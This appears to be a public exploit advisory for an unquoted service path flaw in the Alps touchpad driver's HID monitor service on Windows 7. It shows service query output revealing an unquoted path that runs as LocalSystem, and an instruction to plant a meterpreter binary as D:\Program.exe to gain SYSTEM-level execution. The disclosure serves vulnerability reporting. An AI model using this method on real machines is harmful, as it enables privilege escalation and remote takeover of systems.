# Exploit Title: [Alps Touchpad Driver - Unquoted Service Path Privilege Escalation]
# Google Dork: [N/A]
# Date: [date]
# Exploit Author: [Owais Mehtab, Tayeeb Rana]
# Vendor Homepage: [http://www.alps.com/]
# Software Link: [http://h20564.www2.hp.com/hpsc/swd/public/detail?swItemId=ob_140673_1]
# Version: [8.2206.1717.143]
# Tested on: [Win7 Sp1]


C:\>sc qc ApHidMonitorService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ApHidMonitorService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : D:\Program Files\Alps\GlidePoint\HidMonitorSvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Alps HID Monitor Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

place a you meterpreter binary in D drive named as Program.exe